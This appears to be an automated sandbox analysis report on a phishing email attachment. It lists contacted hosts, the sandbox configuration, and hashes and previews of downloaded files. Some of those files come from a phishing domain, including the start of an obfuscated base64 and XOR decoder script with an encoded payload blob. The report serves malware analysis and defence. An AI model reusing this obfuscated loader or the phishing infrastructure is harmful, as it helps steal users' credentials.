                                                                                                                                                                                                              172.67.221.194
                                                                                                                                                                                                              asix.jiitimeztcw.esUnited States
                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                              104.16.6.189
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              35.190.80.1
                                                                                                                                                                                                              a.nel.cloudflare.comUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              104.16.2.189
                                                                                                                                                                                                              developers.cloudflare.comUnited States
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              104.17.24.14
                                                                                                                                                                                                              cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              64.233.180.84
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              142.251.35.170
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              142.250.80.100
                                                                                                                                                                                                              www.google.comUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              142.250.65.195
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              18.164.124.96
                                                                                                                                                                                                              d19d360lklgih4.cloudfront.netUnited States
                                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                              52.123.128.14
                                                                                                                                                                                                              s-0005.dual-s-msedge.netUnited States
                                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                              151.101.2.137
                                                                                                                                                                                                              code.jquery.comUnited States
                                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                                              142.251.40.99
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              192.35.177.23
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              11791SLC-IDENT-ASUSfalse
                                                                                                                                                                                                              52.111.227.28
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                              13.69.116.107
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                              IP
                                                                                                                                                                                                              192.168.2.17
                                                                                                                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                              Analysis ID:1647391
                                                                                                                                                                                                              Start date and time:2025-03-24 19:34:04 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:16
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              Analysis Mode:stream
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:EXTERNAL Cash Flow Analysis Final Review Needed Before Submission.msg
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.phis.evad.winMSG@23/32@32/171
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .msg
                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 192.35.177.23, 13.69.116.107, 52.123.128.14, 52.149.20.212, 184.31.69.3
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ecs.office.com, fs.microsoft.com, dual-s-0005-office.config.skype.com, slscr.update.microsoft.com, commercial.ocsp.identrust.com, onedscolprdweu09.westeurope.cloudapp.azure.com, ecs.office.trafficmanager.net, mobile.events.data.microsoft.com, mobile.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • VT rate limit hit for: m78bw.ajcffp.ru
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):35970
                                                                                                                                                                                                              Entropy (8bit):7.989503040923577
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                                                                                                                                                              SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                                                                                                                                                              SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                                                                                                                                                              SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/GDSherpa-bold.woff
                                                                                                                                                                                                              Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines (26765), with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):26765
                                                                                                                                                                                                              Entropy (8bit):5.114987586674101
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:1A862A89D5633FAC83D763886726740D
                                                                                                                                                                                                              SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                                                                                                                                                                              SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                                                                                                                                                                              SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/3461WfUGozdcdhoMoyq8920
                                                                                                                                                                                                              Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):93276
                                                                                                                                                                                                              Entropy (8bit):7.997636438159837
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                                                                                                                                                              SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                                                                                                                                                              SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                                                                                                                                                              SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/GDSherpa-vf2.woff2
                                                                                                                                                                                                              Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):128
                                                                                                                                                                                                              Entropy (8bit):4.750616928608237
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:D90F02F133E7B82AF89B3E58526AC459
                                                                                                                                                                                                              SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                                                                                                                                                                              SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                                                                                                                                                                              SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCXWYkfACsuPMEgUNX1f-DRIFDRObJGMhfYjRRuIRn1ESSglQqNFzTrWsNxIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0IQJ53CY_Glpq?alt=proto
                                                                                                                                                                                                              Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines (10017)
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):10245
                                                                                                                                                                                                              Entropy (8bit):5.437589264532084
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                                                                                                                                                              SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                                                                                                                                                              SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                                                                                                                                                              SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250324%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250324T183458Z&X-Amz-Expires=300&X-Amz-Signature=106c59e52187ed8365d91d251ac2458ed757598528aea816dcb41ebce89abcb3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                                                                                                                                                              Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9648
                                                                                                                                                                                                              Entropy (8bit):7.9099172475143416
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:4946EB373B18D178C93D473489673BB6
                                                                                                                                                                                                              SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                                                                                                                                                              SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                                                                                                                                                              SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):43596
                                                                                                                                                                                                              Entropy (8bit):7.9952701440723475
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                                                                                                                                                              SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                                                                                                                                                              SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                                                                                                                                                              SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/GDSherpa-vf.woff2
                                                                                                                                                                                                              Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):17842
                                                                                                                                                                                                              Entropy (8bit):7.821645806304586
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:4B52ECDC33382C9DCA874F551990E704
                                                                                                                                                                                                              SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                                                                                                                                                              SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                                                                                                                                                              SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/uvAvGkzUPzYsrtIeQrJV34vxwRhrm3BqumnX33aAUDQoDsHJYfhlRDVlUqepnfFM0vJef260
                                                                                                                                                                                                              Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (17093), with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                              Entropy (8bit):5.908509123157769
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:8FC4146FF643DF54CB1385D5315A7AC6
                                                                                                                                                                                                              SHA1:222DEC9270D7D841D44BBF572BC5688E837AEF06
                                                                                                                                                                                                              SHA-256:7C323373A0FE447F49064B8A716DD55DD4BEB5308E462C255B41566708A25E29
                                                                                                                                                                                                              SHA-512:E2ED1707E0381672C2A2076F72D97262FC3ED6C35957CF63EE76339737E534A9D56258E45EC51E93BC85D475E6FB107AD6905F278443AF39C132476FAFD65D65
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/ERcPqD/
                                                                                                                                                                                                              Preview:<script>..function xzZyUMEgUW(mBBocshtYt, iIALxZyXoG) {..let pMcQVkNNkd = '';..mBBocshtYt = atob(mBBocshtYt);..let vCehWIZTqo = iIALxZyXoG.length;..for (let i = 0; i < mBBocshtYt.length; i++) {.. pMcQVkNNkd += String.fromCharCode(mBBocshtYt.charCodeAt(i) ^ iIALxZyXoG.charCodeAt(i % vCehWIZTqo));..}..return pMcQVkNNkd;..}..var pwhyrsslAi = xzZyUMEgUW(`T0UUKxk5H1JBRBALVTEEPRsBCBlcVRg9FWcBA0dTAU9ZOh8kRBhDQxZEDnRDZ11cAhgeXxl3GjpJTA4ZAFUFMAA9VX84CgBVBTAAPUsBQFVOFB8tBDkYSB0ZEFIZMwNnCB5dQxdQGzgCLEURXVtcVx04CGYHG1BFXFUFIAA9BF9YRVwCWWheeEQRQE8DQhh0GjpFH1tYXVwEe051RAFRRBpGA2d9Q2Z4DkUQRB4pBHdmeFxTBBYxLB4qHxtdWFtXAzYSYUwTZW8UfTBsGC0GHlxvK2QBOhl8WChlfBhVGjVCEzM7VVA7QRA9QiUeKHUPQHoaFxgrLApjVzRwAj03cB87ek5Lfz89ACsGIERSCgMROjchAxBcZAVUJBtILygwR28rbAcDQg9bEAF/BlIvFxwqADRcbCQDRxUdJR4rAE5CbDAPCgIoOHFSK3wAEBkiGzt6RT11HhgXACgzVX8wdxA9QiUeKHUPQHoaIQYQWTQCVyQPAhA0eQw7X3AaVEQPQAYGOEFvJAMFEBo6JTFcBj11GgsGEFgkRmwkA0cVHQ8AKHdgQWwgbEAdLB5IUjRgAgMoAAQ7X0IfUyALBi1ZRlt6MHQaPSd8ARZ1WgVUHhgfEzMoXlQdZwcQODolMVt3FH80
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):270
                                                                                                                                                                                                              Entropy (8bit):4.840496990713235
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:40EB39126300B56BF66C20EE75B54093
                                                                                                                                                                                                              SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                                                                                                                                              SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                                                                                                                                              SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):592
                                                                                                                                                                                                              Entropy (8bit):4.301298432132512
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:7240DD2CE90A8584FF9411D174CBB5EA
                                                                                                                                                                                                              SHA1:F6688DE10D9B0DD85E2BBC9E98950ED52B7F4A21
                                                                                                                                                                                                              SHA-256:8A89F1D7CCA36C12063222572BAD0CD7604128F0726FA64753B26547F10A7DAD
                                                                                                                                                                                                              SHA-512:749DD8B5451031C6DDE633541A55DD2568298A9B7F5EA04559A28C26D0074BE08EC30ED85580436E05E3958F32FBA815C2E95047E1FBDE28B3C2F24065930212
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:RIFFH...WEBPVP8X.... ...1.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6VP8 Z...p....*2...>m6.H.".!$.....g....8..(....R._.].5.K....9z.i...;> ...+........i.%....=..b...
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):89501
                                                                                                                                                                                                              Entropy (8bit):5.289893677458563
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
